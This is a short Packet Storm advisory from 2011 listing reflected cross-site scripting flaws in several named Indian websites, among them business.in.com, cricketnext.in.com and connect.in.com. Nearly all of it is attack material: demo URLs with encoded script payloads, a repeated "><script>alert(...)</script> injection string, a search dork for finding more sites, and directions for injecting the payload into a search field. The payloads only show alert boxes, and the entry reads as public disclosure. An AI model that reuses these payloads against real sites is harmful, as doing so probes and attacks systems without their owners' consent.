Various Indian Sites Cross Site Scripting

2011-07-07T00:00:00
ID PACKETSTORM:102866
Type packetstorm
Reporter r007k17-w
Modified 2011-07-07T00:00:00

Description

                                        
                                            ` %+  
$.......#........4.........|)........0............\/\/ %+  
  
  
%+  
%+  
  
%+++++++++++++++++++++++++++++  
+++++++++++  
  
  
# Exploit Title: *.in.com XSS vulnerability  
# Vendor: various  
# Date: 6th july,2011  
# Author: r007k17 a.k.a Raghavendra Karthik D  
# link: http://shadowrootkit.wordpress.com/  
# Google Dork: © Copyright 2010, Business.in.com  
************************************************************  
************************************************************  
********************  
*****************************  
  
  
{DEMO} :  
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E  
  
EXPLOIT: "><script>alert(/s/)</script>  
  
  
{DEMO} :  
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E  
  
EXPLOIT: "><script>alert(/s/)</script>  
  
  
{DEMO} :  
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E  
  
EXPLOIT: "><script>alert(/r007k17/)</script>  
  
  
Reflected XSS in connect.in.com  
Inject EXPLOIT below in search field in http://connect.in.com  
observe a pop-up saying r007k17  
  
{DEMO} : http://connect.in.com  
  
EXPLOIT: "><script>alert(/r007k17/)</script>  
  
  
  
************************************************************  
************************************************************  
*********************************************  
sp3c14l Thanks to s1d3^effects and my friends@!3.14--  
************************************************************  
*********************************************************************************************************  
`